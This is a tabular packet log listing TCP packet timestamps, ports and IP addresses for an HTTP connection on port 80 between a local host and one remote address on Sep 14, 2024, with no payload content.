Sep 14, 2024 18:31:11.519428015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519467115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520011902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520030975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520042896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520052910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520066023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520070076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520083904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520096064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520106077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520111084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520139933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520191908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520204067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520215988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520226955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520239115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520247936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520277977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520303011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520313978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520324945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520335913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520347118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520354033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520359039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520373106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520375013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520397902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520436049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520448923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520466089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520476103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520487070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520492077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520498991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520528078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520558119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520567894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520580053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520591021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520603895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520613909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.520622969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520642042 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.520659924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.521087885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.529540062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529551029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529560089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529618025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.529633045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529643059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529653072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529663086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529671907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.529721022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.558525085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558533907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558566093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558615923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558625937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558635950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558756113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.558757067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.558757067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.558763981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558774948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.558850050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.601391077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601401091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601417065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601427078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601442099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601490021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601500034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601509094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601622105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.601622105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.601622105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.601721048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601802111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601811886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601845980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601855040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601865053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601875067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.601943016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.602150917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602160931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602170944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602247000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.602266073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602276087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602287054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602296114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602303982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.602344036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604072094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604084015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604093075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604140043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604176044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604185104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604196072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604206085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604217052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604243994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604264975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604275942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604773998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604784966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604795933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604861021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604866028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604872942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604885101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604897976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.604924917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.604959965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605523109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605556965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605566978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605607033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605623960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605634928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605644941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605679035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605685949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605703115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605705023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605719090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605747938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605797052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605807066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605818033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605828047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605839968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605926991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.605951071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605959892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605967045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605973005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605983019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.605993986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606004953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606017113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606040955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606071949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606091976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606101990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606117010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606127024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606195927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606244087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606255054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606266022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606275082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606285095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606297016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606353045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606388092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606394053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606406927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606417894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606429100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606441021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606451035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606528997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.606946945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606956959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.606967926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607039928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607058048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607069016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607079983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607091904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607110023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607116938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607150078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607161045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607178926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607186079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607188940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607201099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607220888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607245922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607259035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607270002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607280970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607290983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607302904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607310057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607325077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607359886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607393026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607402086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607413054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607429981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607446909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607455969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607459068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607491016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607501030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607503891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607512951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607527018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607537031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.607548952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607583046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.607583046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.616574049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616585016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616596937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616652966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.616664886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616676092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616687059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616698027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.616749048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.616780043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.645741940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645751953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645762920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645843029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645852089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645862103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645870924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645879030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.645950079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.645950079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.645950079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688446999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688457012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688466072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688474894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688484907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688496113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688512087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688519955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688535929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688549042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688555956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688599110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688608885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688617945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688631058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688636065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688631058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688631058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688647032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688718081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688726902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.688728094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688728094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688729048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.688766003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.689064026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689074993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689090014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689122915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.689161062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689171076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689179897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689191103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689198971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.689212084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.689245939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.690968990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.690978050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.690988064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691026926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691065073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691076994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691086054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691096067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691106081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691127062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691164017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691164017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691869020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691879034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691889048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691898108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691907883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691916943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691926956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691927910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691936016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.691962957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.691994905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.692699909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692712069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692723989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692764044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.692801952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692814112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692823887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692836046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692847013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692859888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.692889929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.692926884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692939043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692949057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.692961931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693000078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693023920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693032026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693043947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693054914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693067074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693087101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693119049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693154097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693166018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693176985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693188906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693200111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693208933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693211079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693252087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693284988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693389893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693401098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693411112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693422079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693433046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693442106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693444967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693455935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693468094 CEST	80	49738	172.67.203.195	192.168.2.4
